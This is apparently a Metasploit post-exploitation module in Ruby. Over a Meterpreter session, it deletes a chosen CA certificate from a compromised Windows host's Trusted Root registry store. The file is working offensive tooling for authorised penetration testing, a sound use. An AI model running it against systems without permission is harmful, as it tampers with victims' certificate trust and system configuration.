Path: blob/master/modules/post/windows/manage/remove_ca.rb
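##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  # Machine-wide Trusted Root store. Each subkey under this branch is named
  # after a certificate's SHA1 hash, which is what CERTID is matched against.
  ROOT_STORE_KEY = 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Certificate Authority Removal',
        'Description' => %q{
          This module removes the specified CA certificate from the
          system Trusted Root store.
        },
        'License' => BSD_LICENSE,
        'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            # Every registry command this module actually issues, so the
            # compatibility check reflects enum/delete/close as well as open.
            'Commands' => %w[
              stdapi_registry_close_key
              stdapi_registry_delete_key
              stdapi_registry_enum_key
              stdapi_registry_open_key
            ]
          }
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('CERTID', [ true, 'SHA1 hash of the certificate to remove.', '']),
      ]
    )
  end

  # Deletes the Trusted Root CA subkey named by CERTID.
  #
  # Prints an error and returns without changing anything when CERTID is
  # blank, the store branch is empty, the CA is not present, or the registry
  # request fails (for example, insufficient rights on the HKLM branch).
  def run
    certtoremove = datastore['CERTID'].to_s.strip
    if certtoremove.empty?
      print_error('CERTID must be set to the SHA1 hash of the certificate to remove.')
      return
    end

    # Check if the requested cert is actually in the registry to start with
    keys = with_root_store(KEY_READ) { |store| store.enum_key }

    if keys.empty?
      print_error('These are not the CAs you are looking for (i.e. this registry branch is empty)')
      return
    end

    # Subkey names are hex; compare case-insensitively so a lower-case CERTID
    # still matches, then delete using the name exactly as the registry has it.
    target = keys.find { |name| name.casecmp?(certtoremove) }
    unless target
      print_error('The specified CA is not in the registry.')
      return
    end

    with_root_store(KEY_WRITE) { |store| store.delete_key(target) }
    print_good("Successfully deleted CA: #{target}")
  rescue ::Rex::Post::Meterpreter::RequestError => e
    print_error("Registry operation on the Trusted Root store failed: #{e}")
  end

  private

  # Opens ROOT_STORE_KEY with the given access mask, yields the handle and
  # always closes it, so no registry handle is left open on the target.
  #
  # @param perm [Integer] access mask, e.g. KEY_READ or KEY_WRITE
  # @return the block's result
  def with_root_store(perm)
    rkey, bkey = client.sys.registry.splitkey(ROOT_STORE_KEY)
    handle = client.sys.registry.open_key(rkey, bkey, perm)
    begin
      yield handle
    ensure
      handle.close
    end
  end
end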